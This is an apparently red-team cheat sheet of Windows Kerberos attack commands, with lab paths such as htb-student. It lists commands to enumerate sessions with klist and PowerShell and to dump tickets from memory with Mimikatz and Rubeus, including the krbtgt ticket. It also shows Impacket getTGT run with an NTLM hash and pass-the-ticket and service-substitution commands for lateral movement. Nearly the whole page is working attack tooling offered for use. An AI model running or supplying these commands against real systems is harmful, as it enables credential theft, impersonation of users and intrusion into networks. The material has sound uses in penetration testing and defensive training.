Resources

Cheat Sheet

Commands

  • Recon
    • LOTL
      • klist
        klist
      • Win32_LogonSession
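        # Enumerate logon sessions on the host and map each to the account that
        # owns it, using only built-in CIM classes (no extra tooling required).
        # Output: one row per session with an associated account — LUID (hex,
        # as klist displays it), UserName, Domain and the numeric LogonType.
        Get-CimInstance -ClassName Win32_LogonSession | ForEach-Object {
            # LogonId is cast to int64 and rendered as hex so it can be compared
            # directly with the LUIDs reported by klist.
            $Luid = [System.Convert]::ToString([int64]$_.LogonId, 16)
            # Some sessions have no associated Win32_Account (e.g. torn-down or
            # system-internal sessions); the error is suppressed deliberately and
            # those rows are dropped by the Where-Object filter below.
            $User = $_ | Get-CimAssociatedInstance -ResultClassName Win32_Account -ErrorAction SilentlyContinue
            [PSCustomObject]@{
                LUID     = "0x$Luid"
                UserName = $User.Name
                Domain   = $User.Domain
                Type     = $_.LogonType
            }
        } | Where-Object { $_.UserName } | Format-Table -AutoSize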
    • Rubeus
      .\Rubeus.exe triage
      .\Rubeus.exe klist
    • Mimikatz
      sekurlsa::tickets # sekurlsa uses memory reading and is not subject to key export restrictions.
      kerberos::list # Only for the current session 
      kerberos::list /export # export 
  • Generating
    • Impacket
      • getTGT
        sudo timedatectl set-ntp off # if running from a virtual machine
         
        sudo ntpdate 192.168.99.30 && impacket-getTGT 'redteamrecipes.com/fmoheb' -hashes :70acaa6bad1c4d34405f748f3fa4a9d1 -no-pass -dc-ip 192.168.99.30
         
        export KRB5CCNAME=fmoheb.ccache
  • Dumping
    • Rubeus
      .\Rubeus.exe dump /luid:0x3e7 /nowrap
      .\Rubeus.exe dump /service:krbtgt /nowrap
  • Passing
    • Rubeus
      .\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show /ticket:doIGSzCCBkegAwIBBaEDAgEWooIFMzCCBS9hggUrMIIFJ6A.....
      .\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show /ticket:'./output.kirbi' /show
       
      .\Rubeus.exe ptt /luid:0x10888c /ticket:./output.kirbi => the LUID is my own session's (taken from klist); this requires admin
       
      .\Rubeus.exe tgssub /altservice:cifs /ticket:./output.kirbi /nowrap
       
      # Tips & Tricks
      .\Rubeus.exe describe /ticket:doIGDjCCBgqgAwIBBaEDAgEWooIE/jC
       
      [IO.File]::WriteAllBytes("C:\output.kirbi", [Convert]::FromBase64String("doIGSzCCBkegAwI....."))
       
      Rubeus.exe renew /ticket:doIF3jCCBdqgAwIB
    • Mimikatz
      kerberos::ptt C:\Users\htb-student\Desktop\output.kirbi

Notes